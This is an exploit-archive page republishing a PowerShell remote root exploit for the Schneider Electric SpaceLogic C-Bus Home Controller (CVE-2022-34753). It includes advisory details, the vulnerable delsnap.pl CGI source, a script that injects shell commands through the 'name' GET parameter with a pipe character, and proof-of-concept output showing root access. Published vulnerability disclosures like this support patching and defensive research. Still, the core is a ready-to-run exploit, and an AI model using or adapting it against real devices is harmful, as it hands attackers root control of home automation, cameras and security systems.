Share
## https://sploitus.com/exploit?id=PACKETSTORM:167783
<#SpaceLogic.ps1  
  
Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit  
  
  
Vendor: Schneider Electric SE  
Product web page: https://www.se.com  
https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/  
https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware  
Affected version: SpaceLogic C-Bus Home Controller (5200WHC2)  
formerly known as C-Bus Wiser Home Controller MK2  
V1.31.460 and prior  
Firmware: 604  
  
Summary: SpaceLogic C-Bus Home Automation System  
Lighting control and automation solutions for  
buildings of the future, part of SpaceLogic.  
SpaceLogic C-Bus is a powerful, fully integrated  
system that can control and automate lighting  
and many other electrical systems and products.  
The SpaceLogic C-Bus system is robust, flexible,  
scalable and has proven solutions for buildings  
of the future. Implemented for commercial and  
residential buildings automation, it brings  
control, comfort, efficiency and ease of use  
to its occupants.  
  
Wiser Home Control makes technologies in your  
home easy by providing seamless control of music,  
home theatre, lighting, air conditioning, sprinkler  
systems, curtains and shutters, security systems...  
you name it. Usable anytime, anywhere even when  
you are away, via preset shortcuts or direct  
control, in the same look and feel from a wall  
switch, a home computer, or even your smartphone  
or TV - there is no wiser way to enjoy 24/7  
connectivity, comfort and convenience, entertainment  
and peace of mind homewide!   
  
The Wiser 2 Home Controller allows you to access  
your C-Bus using a graphical user interface, sometimes  
referred to as the Wiser 2 UI. The Wiser 2 Home  
Controller arrives with a sample project loaded  
and the user interface accessible from your local  
home network. With certain options set, you can  
also access the Wiser 2 UI from anywhere using  
the Internet. Using the Wiser 2 Home Controller  
you can: control equipment such as IP cameras,  
C-Bus devices and non C-Bus wired and wireless  
equipment on the home LAN, schedule events in  
the home, create and store scenes on-board, customise  
a C-Bus system using the on-board Logic Engine,  
monitor the home environment including C-Bus and  
security systems, control ZigBee products such  
as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.  
  
Examples of equipment you might access with Wiser  
2 Home Controller include lighting, HVAC, curtains,  
cameras, sprinkler systems, power monitoring, Ulti-ZigBee,  
multi-room audio and security controls.  
  
Desc: The home automation solution suffers from  
an authenticated OS command injection vulnerability.  
This can be exploited to inject and execute arbitrary  
shell commands as the root user via the 'name' GET  
parameter in 'delsnap.pl' Perl/CGI script which is  
used for deleting snapshots taken from the webcam.  
  
=========================================================  
/www/delsnap.pl:  
----------------  
  
01: #!/usr/bin/perl  
02: use IO::Handle;  
03:  
04:  
05: select(STDERR);  
06: $| = 1;  
07: select(STDOUT);  
08: $| = 1;  
09:  
10: #print "\r\n\r\n";  
11:  
12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';  
13: use CGI;  
14:  
15: my $PROGNAME = "delsnap.pl";  
16:  
17: my $cgi = new CGI();  
18:  
19: my $name = $cgi->param('name');  
20: if ($name eq "list") {  
21: print "\r\n\r\n";  
22: print "DATA=";  
23: print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;  
24: exit(0);  
25: }  
26: if ($name eq "deleteall") {  
27: print "\r\n\r\n";  
28: print "DELETINGALL=TRUE&";  
29: print `rm /mnt/microsd/clipsal/ugen/imgs/*`;  
30: print "COMPLETED=true\n";  
31: exit(0);  
32: }  
33: #print "name $name\n";  
34: print "\r\n\r\n";  
35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";  
36:  
37: unlink $filename or die "COMPLETED=false\n";  
38:  
39: print "COMPLETED=true\n";  
  
=========================================================  
  
Tested on: Machine: OMAP3 Wiser2 Board  
CPU: ARMv7 revision 2  
GNU/Linux 2.6.37 (armv7l)  
BusyBox v1.22.1  
thttpd/2.25b  
Perl v5.20.0  
Clipsal 81  
Angstrom 2009.X-stable  
PICED 4.14.0.100  
lighttpd/1.7  
GCC 4.4.3  
NodeJS v10.15.3  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2022-5710  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php  
  
Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf  
  
CVE ID: CVE-2022-34753  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753  
  
  
27.03.2022  
  
#>  
  
  
$host.UI.RawUI.ForegroundColor = "Green"  
if ($($args.Count) -ne 2) {  
Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")  
} else {  
$ip = $args[0]  
$cmd = $args[1]  
$cmdinj = "/delsnap.pl?name=|$cmd"  
Write-Host("`nSending command '$cmd' to $ip`n")  
#curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj  
curl -v $ip$cmdinj  
}  
  
  
<#PoC  
  
PS C:\> .\SpaceLogic.ps1  
  
Usage: .\SpaceLogic.ps1 [IP] [CMD]  
  
  
PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"  
  
Sending command 'uname -a;id;pwd' to 192.168.1.2  
  
VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload  
VERBOSE: received 129-byte response of content type text/html; charset=utf-8  
  
  
StatusCode : 200  
StatusDescription : OK  
Content : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux  
uid=0(root) gid=0(root)  
/custom-package  
  
RawContent : HTTP/1.1 200 OK  
Access-Control-Allow-Origin: *  
Connection: keep-alive  
Content-Length: 129  
Content-Type: text/html; charset=utf-8  
Date: Thu, 30 Jun 2022 14:48:43 GMT  
ETag: W/"81-LTIWJvYlDBYAlgXEy...  
Forms : {}  
Headers : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html;   
charset=utf-8]...}  
Images : {}  
InputFields : {}  
Links : {}  
ParsedHtml : mshtml.HTMLDocumentClass  
RawContentLength : 129  
  
  
  
  
PS C:\>  
#>